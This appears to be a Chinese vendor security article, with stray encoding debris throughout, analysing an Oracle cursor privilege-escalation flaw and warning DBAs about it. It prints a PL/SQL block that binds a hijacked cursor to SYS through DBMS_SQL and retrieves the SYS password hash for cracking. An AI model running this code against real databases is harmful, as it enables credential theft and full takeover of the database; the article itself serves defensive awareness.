前文中我們提到Oracle游標(biāo)的數(shù)據(jù)庫安全隱患之一�����,如果由于人為原因沒有及時關(guān)閉游標(biāo)��,黑客可以通過對制造異常���,使游標(biāo)持續(xù)處于被掛起狀態(tài)��,然后進行惡意代碼注入�����。再利用游標(biāo)自身的高權(quán)限執(zhí)行惡意代碼����,進行越權(quán)或者非法提權(quán)操作。本文我們針對游標(biāo)提權(quán)漏洞進行實例分析�。
游標(biāo)提權(quán)漏洞就是在上面的基礎(chǔ)上利用被掛起的游標(biāo),通過類似DBMS_SQL這種由系統(tǒng)定義的包�����,把游標(biāo)語句和高權(quán)限用戶進行綁定�。接著上面的例子通過DBMS_SQL綁定SYS,用戶直接獲取SYS的密碼HASH���。
SQL> DECLARE
2 CURSOR_NAME INTEGER;
3 I INTEGER;
4 PWD VARCHAR2(30);
5 BEGIN
6 CURSOR_NAME:=3241423;
7 DBMS_SQL.BIND_VARIABLE(CURSOR_NAME,':schina','SYS')���;
8 DBMS_SQL.DEFINE_COLUMN(CURSOR_NAME,1,PWD,30)����;
9 I:=DBMS_SQL.EXECUTE(CURSOR_NAME)�;
10 IF DBMS_SQL.FETCH_ROWS(CURSOR_NAME)>0 THEN
11 DBMS_SQL.COLUMN_VALUE(CURSOR_NAME,1,PWD);
12 END IF;
13 DBMS_SQL.CLOSE_CURSOR(CURSOR_NAME)���;
14 DBMS_OUTPUT.PUT_LINE ('PWD:'||PWD);
15 END��;
16 /
上述代碼是在獲取游標(biāo)值的前提下進行的�����,因此在代碼聲明的地方寫入游標(biāo)值3241423����。使用DBMS_SQL中的BIND_VARIABLE(cursor_name,':schina',sys)將游標(biāo)和SYS用戶綁定�����。這樣執(zhí)行查詢SYS用戶�。后臺數(shù)據(jù)庫真正運行的語句是:select password from sys.dba_users where username='sys'。DBMS_SQl.define_column函數(shù)的作用是將游標(biāo)中第一列的值返回給PWD變量���。黑客在執(zhí)行完上述匿名塊后����,系統(tǒng)結(jié)果返回SYS密碼的HASH散列,使用HASH逆向工具進行轉(zhuǎn)換就可以獲得SYS密碼明文�����,直接奪取數(shù)據(jù)庫最高權(quán)限�。
至此,對游標(biāo)漏洞的提權(quán)完成�����,黑客獲取數(shù)據(jù)庫最高權(quán)限�,那么真正的數(shù)據(jù)庫安全危機也正式爆發(fā)。利用數(shù)據(jù)庫最高權(quán)限���,黑客可以對數(shù)據(jù)庫中的核心數(shù)據(jù)整庫拿走或進行增刪改查等關(guān)鍵動作��,造成一系列嚴(yán)重后果�。通過此文的分析�,希望對DBA等數(shù)據(jù)庫管理人員予以警示。
產(chǎn)品咨詢:4000 258 365 
